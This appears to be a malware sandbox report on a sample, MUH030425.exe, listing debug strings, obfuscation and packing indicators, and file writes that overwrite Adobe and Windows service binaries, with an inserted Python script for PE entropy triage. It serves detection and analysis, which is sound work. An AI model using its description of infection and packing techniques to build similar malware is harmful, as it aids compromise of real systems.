              Source: Binary string: System.Windows.Forms.pdb.> source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe.13.dr
              Source: Binary string: minidump-analyzer.pdb source: alg.exe, 0000000D.00000003.2157918575.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.8.dr
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.pdb4 source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 0000000D.00000003.1774099876.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000000D.00000003.1859682808.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000000D.00000003.1794989425.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000D.00000003.1838763806.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1839825345.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1846357220.0000000001530000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000000D.00000003.1696706041.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: crashreporter.pdb source: alg.exe, 0000000D.00000003.2059367986.0000000000400000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 0000000D.00000003.1790232245.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000000D.00000003.1724231457.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.Core.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: Locator.exe.8.dr
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000000D.00000003.1696706041.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: private_browsing.pdb source: alg.exe, 0000000D.00000003.2212108302.0000000000670000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000D.00000003.1838763806.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1839825345.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1846357220.0000000001530000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000000D.00000003.1637621243.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 0000000D.00000003.1742573812.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.13.dr
              Source: Binary string: ucrtbase.pdbUGP source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: alg.exe, 0000000D.00000003.1873376292.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1876347240.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pixuBt.pdb source: MUH030425.exe, WER4A31.tmp.dmp.18.dr
              Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 0000000D.00000003.1781474310.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.13.dr
              Source: Binary string: System.Drawing.pdb( source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000000D.00000003.1770420067.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: private_browsing.pdbp source: alg.exe, 0000000D.00000003.2212108302.0000000000670000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000000D.00000003.1794989425.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 0000000D.00000003.1774099876.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 0000000D.00000003.1790232245.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000000D.00000003.2131240760.0000000000440000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdbD(L source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 0000000D.00000003.1747818920.0000000001650000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.13.dr
              Source: Binary string: System.Configuration.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb<<7 source: ssvagent.exe.13.dr
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: vcruntime140.i386.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pixuBt.pdbSHA256 source: MUH030425.exe, WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: alg.exe, 0000000D.00000003.1602398119.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: Locator.exe.8.dr
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: default-browser-agent.pdb source: alg.exe, 0000000D.00000003.2095519854.0000000000400000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: updater.pdb source: alg.exe, 0000000D.00000003.2233883361.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000000D.00000003.1859682808.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 0000000D.00000003.1747818920.0000000001650000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.13.dr
              Source: Binary string: System.Xml.pdb@\ source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr

              Data Obfuscation

              Source: 0.2.MUH030425.exe.50f0000.1.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
              Source: alg.exe.8.dr | Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,8_2_0040B15C
              Source: AcroCEF.exe.8.dr | Static PE information: section name: .didat
              Source: AcroCEF.exe.8.dr | Static PE information: section name: _RDATA
              Source: SingleClientServicesUpdater.exe.8.dr | Static PE information: section name: .didat
              Source: SingleClientServicesUpdater.exe.8.dr | Static PE information: section name: _RDATA
              Source: armsvc.exe.8.dr | Static PE information: section name: .didat
              Source: alg.exe.8.dr | Static PE information: section name: .didat
              Source: FXSSVC.exe.8.dr | Static PE information: section name: .didat
              Source: elevation_service.exe.8.dr | Static PE information: section name: .00cfg
              Source: elevation_service.exe.8.dr | Static PE information: section name: .gxfg
              Source: elevation_service.exe.8.dr | Static PE information: section name: .retplne
              Source: elevation_service.exe.8.dr | Static PE information: section name: _RDATA
              Source: elevation_service.exe.8.dr | Static PE information: section name: malloc_h
              Source: elevation_service.exe0.8.dr | Static PE information: section name: .00cfg
              Source: elevation_service.exe0.8.dr | Static PE information: section name: .gxfg
              Source: elevation_service.exe0.8.dr | Static PE information: section name: .retplne
              Source: elevation_service.exe0.8.dr | Static PE information: section name: _RDATA
              Source: elevation_service.exe0.8.dr | Static PE information: section name: malloc_h
              Source: maintenanceservice.exe.8.dr | Static PE information: section name: .00cfg
              Source: maintenanceservice.exe.8.dr | Static PE information: section name: .voltbl
              Source: maintenanceservice.exe.8.dr | Static PE information: section name: _RDATA
              Source: msdtc.exe.8.dr | Static PE information: section name: .didat
              Source: msiexec.exe.8.dr | Static PE information: section name: .didat
              Source: MsSense.exe.8.dr | Static PE information: section name: .didat
              Source: Spectrum.exe.8.dr | Static PE information: section name: .didat
              Source: TieringEngineService.exe.8.dr | Static PE information: section name: .didat
              Source: vds.exe.8.dr | Static PE information: section name: .didat
              Source: VSSVC.exe.8.dr | Static PE information: section name: .didat
              Source: WmiApSrv.exe.8.dr | Static PE information: section name: .didat
              Source: msvcp140.dll.8.dr | Static PE information: section name: .didat
              Source: wmpnetwk.exe.8.dr | Static PE information: section name: .didat
              Source: SearchIndexer.exe.8.dr | Static PE information: section name: .didat
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040D86E push 0040D89Ch; ret 8_2_0040D894
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040D870 push 0040D89Ch; ret 8_2_0040D894
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004140C0 push 004140ECh; ret 8_2_004140E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004108C8 push 004108F4h; ret 8_2_004108EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040B0F7 push 0040B124h; ret 8_2_0040B11C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040B0F8 push 0040B124h; ret 8_2_0040B11C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00408080 push 004080B8h; ret 8_2_004080B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00408158 push 00408196h; ret 8_2_0040818E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00408970 push 004089E4h; ret 8_2_004089DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00408994 push 004089E4h; ret 8_2_004089DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_004089AC push 004089E4h; ret 8_2_004089DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00415208 push 0041528Ch; ret 8_2_00415284
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040CA0C push 0040CA3Ch; ret 8_2_0040CA34
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040CA10 push 0040CA3Ch; ret 8_2_0040CA34
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00417AEC push 00417B18h; ret 8_2_00417B10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00404BC0 push 00404C11h; ret 8_2_00404C09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040D3C0 push 0040D3ECh; ret 8_2_0040D3E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040A3E4 push 0040A410h; ret 8_2_0040A408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040C390 push 0040C3C0h; ret 8_2_0040C3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040C394 push 0040C3C0h; ret 8_2_0040C3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040A3AC push 0040A3D8h; ret 8_2_0040A3D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040DC44 push 0040DCA3h; ret 8_2_0040DC9B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040DC0C push 0040DC38h; ret 8_2_0040DC30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040B41E push 0040B44Ch; ret 8_2_0040B444
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040B420 push 0040B44Ch; ret 8_2_0040B444
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040A438 push 0040A464h; ret 8_2_0040A45C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0041A4F4 push 0041A51Ah; ret 8_2_0041A512
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00414C80 push 00414CACh; ret 8_2_00414CA4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00409488 push 004094B8h; ret 8_2_004094B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0041A4AC push 0041A4E8h; ret 8_2_0041A4E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00418CB8 push 00418CE8h; ret 8_2_00418CE0
              Source: MUH030425.exe | Static PE information: section name: .text entropy: 7.534764441197317
              Source: wBBaygjR.exe.0.dr | Static PE information: section name: .text entropy: 7.534764441197317
              Source: AcroCEF.exe.8.dr | Static PE information: section name: .reloc entropy: 7.937527790890744
              Source: SingleClientServicesUpdater.exe.8.dr | Static PE information: section name: .reloc entropy: 7.9436649035088
              Source: AppVClient.exe.8.dr | Static PE information: section name: .reloc entropy: 7.93647422561389
              Source: FXSSVC.exe.8.dr | Static PE information: section name: .reloc entropy: 7.942225948690676
              Source: elevation_service.exe.8.dr | Static PE information: section name: .reloc entropy: 7.943894441876406
              Source: elevation_service.exe0.8.dr | Static PE information: section name: .reloc entropy: 7.9459114175596905
              Source: SensorDataService.exe.8.dr | Static PE information: section name: .reloc entropy: 7.935330315340683
              Source: Spectrum.exe.8.dr | Static PE information: section name: .reloc entropy: 7.945394677194669
              Source: AgentService.exe.8.dr | Static PE information: section name: .reloc entropy: 7.937062731850421
              Source: vds.exe.8.dr | Static PE information: section name: .reloc entropy: 7.941021905795259
              Source: VSSVC.exe.8.dr | Static PE information: section name: .reloc entropy: 7.939475605270115
              Source: wbengine.exe.8.dr | Static PE information: section name: .reloc entropy: 7.941244565932592
              Source: wmpnetwk.exe.8.dr | Static PE information: section name: .reloc entropy: 7.946563616718318
              Source: SearchIndexer.exe.8.dr | Static PE information: section name: .reloc entropy: 7.94581358190456
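The two static indicators listed above, section names outside the usual toolchain set and sections whose entropy sits close to 8.0 bits per byte, are cheap to reproduce outside the sandbox. The following is an added example, not Joe Sandbox code and not taken from the analysed sample: it walks the PE section table, computes Shannon entropy per section and flags both conditions. The PE image it runs on is constructed in memory, and the 7.0 cutoff and the list of "common" section names are this example's assumptions rather than the values Joe Sandbox uses.

```python
"""Section-name and entropy triage for PE files (added example, see lead-in).

The parser only walks the section table; use pefile for real analysis.
"""
import math
import struct

# Section names the MSVC and .NET toolchains normally emit (assumption). Anything
# else is worth a look; the report above flags .didat, _RDATA, .00cfg, .gxfg,
# .retplne, malloc_h and .voltbl on the overwritten Adobe/Windows binaries.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc",
                   ".idata", ".edata", ".tls", ".bss", ".CRT"}

ENTROPY_THRESHOLD = 7.0  # assumption: bits/byte above which data looks packed or encrypted


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant input, 8.0 for a flat histogram."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    # max() clamps the -0.0 that a constant section would otherwise produce
    return max(0.0, -sum((c / n) * math.log2(c / n) for c in counts if c))


def pe_sections(blob: bytes):
    """Yield (name, raw_offset, raw_size) for each entry in the PE section table."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    for i in range(num_sections):
        off = table + i * 40
        name = blob[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", blob, off + 16)
        yield name, raw_ptr, raw_size


def triage(blob: bytes, threshold: float = ENTROPY_THRESHOLD):
    """Return [(section_name, entropy_rounded, flags)] in section-table order."""
    findings = []
    for name, ptr, size in pe_sections(blob):
        ent = shannon_entropy(blob[ptr:ptr + size])
        flags = []
        if name not in COMMON_SECTIONS:
            flags.append("unusual-name")
        if ent > threshold:
            flags.append("high-entropy")
        findings.append((name, round(ent, 3), flags))
    return findings


def build_sample_pe(sections):
    """Build a minimal, parseable (not loadable) PE32 image from [(name, payload)].

    Constructed for this example only so the triage can run offline.
    """
    opt_size = 0xE0                                       # PE32 optional header
    offset = 0x40 + 4 + 20 + opt_size + 40 * len(sections)  # first raw data offset
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    table, body = bytearray(), bytearray()
    for name, payload in sections:
        table += struct.pack("<8sIIII", name.encode().ljust(8, b"\0"),
                             len(payload), 0x1000, len(payload), offset) + bytes(16)
        body += payload
        offset += len(payload)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table) + bytes(body)


# Constructed sample: low-entropy code-like data, a padding section with an
# unusual name, and a .reloc section holding a flat byte histogram as a stand-in
# for the packed payload the report measures at 7.93-7.95 bits/byte.
SAMPLE_SECTIONS = [
    (".text", b"ABCD" * 1024),
    (".didat", b"\x00" * 512),
    (".reloc", bytes(range(256)) * 16),
]

if __name__ == "__main__":
    for name, ent, flags in triage(build_sample_pe(SAMPLE_SECTIONS)):
        print(f"{name:<8} entropy={ent:5.3f} {' '.join(flags)}")
```

A `.reloc` section at 7.94 bits per byte, as seen on every overwritten binary above, is the tell: genuine relocation tables are highly repetitive and score far lower, so a near-random `.reloc` usually means the infector appended its encrypted payload there and repointed the entry point.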

              Persistence and Installation Behavior

              Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\eab56394c76d7db5.bin
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
